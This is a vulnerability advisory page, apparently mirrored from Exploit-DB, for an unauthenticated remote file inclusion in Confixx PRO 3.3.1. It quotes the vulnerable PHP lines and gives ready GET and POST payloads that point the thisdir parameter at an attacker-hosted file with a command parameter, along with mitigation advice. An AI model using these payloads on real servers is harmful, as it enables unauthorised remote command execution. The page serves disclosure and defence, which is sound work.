Confixx - exploit.company

vendor:

Confixx

by:

H4 / XPK

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: Confixx

Affected Version From:

Affected Version To: Confixx PRO 3.3.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability

The Confixx PRO version 3.3.1 is vulnerable to remote file inclusion. An attacker can access the file saveserver.php without authentication. The vulnerability exists due to the variable $thisdir not being defined in the code. By exploiting this vulnerability, an attacker can execute arbitrary commands on the target system. The conditions for exploitation are that the open_basedir restriction is turned off and allow_url_fopen is set to on. The attacker can send a POST request or a GET request to the saveserver.php file with the parameter thisdir set to a malicious URL that includes the command to be executed. For example, the attacker can send a POST request with thisdir set to http://[yoursite]/images/1.jpg?&cmd=ls -la or a GET request with saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la.

Mitigation:

To mitigate this vulnerability, the open_basedir restriction should be enabled and allow_url_fopen should be set to off in the PHP configuration. Additionally, input validation should be implemented to ensure that the $thisdir variable is properly defined and does not allow remote file inclusion.

Source

Exploit-DB raw data:

[*] Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability
__________________________________________________________________________

[!] Application homepage :   http://www.swsoft.com/de/products/confixx/
[!] Author               :   H4 / XPK
[!] Contact              :   http://xpkzxc.com/
[!] Bug discovered       :   2007-07-21
[!] Bug published        :   2007-07-24
[!] Risk                 :   Moderate

Do not forget visit our page for new vulnerabilites , information and tools.

---------------------------------------------------------------------

Vuln. code: admin/business_inc/saveserver.php

Lines 8-11

if( !in_array($returnto, $actions) )
{
        include( $thisdir . "/business_inc/list.php" );
}

Variable $thisdir is not defined ...

---------------------------------------------------------------------

An attacker does not need to be authenticated to access this file.

[!] Conditions: open_basedir restriction off and allow_url_fopen = on

[!] Exploitation : http://[target]/admin/business_inc/saveserver.php

Post: thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la
Get: saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la

---------------------------------------------------------------------

# milw0rm.com [2007-07-24]